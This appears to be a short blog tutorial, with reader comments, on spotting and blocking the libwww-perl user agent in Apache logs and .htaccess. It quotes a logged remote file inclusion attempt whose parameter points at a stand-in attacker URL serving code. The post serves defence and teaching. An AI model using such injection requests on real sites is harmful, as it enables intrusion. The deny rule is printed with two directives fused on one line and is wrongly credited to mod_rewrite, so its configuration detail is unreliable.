The world of hackers, crackers, bots and spammers are keep growing and it has become serious threat to many websites. libwww-perl (LWP) is a WWW client/server library for Perl and it can help many hackers, spammers and bots to perform attacks on your site. For e.g; Just head on to your web server access log and run the below command.
$ grep ‘libwww-perl’ access_log
Do you see something similar to the below output?
220.127.116.11 www.domain.com - [21/Aug/2013:21:22:38 +0000] "GET /webdir/yesno.phtml?no_url=http://www.hackersite.com/list1.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"
It means, some hacker is trying to use the security hole and install a backdoor pages. So libwww-perl useragent have to be blocked to prevent any such attacks on your website.
How to verify whether libwww-perl useragent is blocked on your server?
Step 1: Download this simple perl script and rename it as ‘test-lwp.pl’.
Step 2: Edit ‘test-lwp.pl’ file and replace http://your-website.com/ with your website name.
Step 3: Give executable permission to the script
chmod +x test-lwp.pl
Step 4 : Run the perl script as below,
Step 4 should display “Error : 403 Forbidden“. If it does not, then your website might be prone for libwww-perl useragent attack.
How to deny libwww-perl attack using .htaccess?
Using mod_rewrite and .htaccess file, we can block user agent libwww-perl. Edit your .htaccess file and add rule as follows:
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots Deny from env=block_bad_bots
Now execute test-lwp.pl file and you should see “Error : 403 Forbidden”. That’s it!
Comments Leave a Comment
/test-lwp.pl: line 1: imple: command not found
./test-lwp.pl: line 2: use: command not found
./test-lwp.pl: line 3: =: command not found
./test-lwp.pl: line 4: syntax error near unexpected token `(‘
./test-lwp.pl: line 4: ` $ua->agent(“$0/0.1 ” . $ua->agent);
I am getting above error while testing my server is protected from perl script attacks
Hi Anil, do you have Perl installed? What does which perl command say?
Thanks peter, its really a required info for all the webmasters….. will be looking more such tips on security.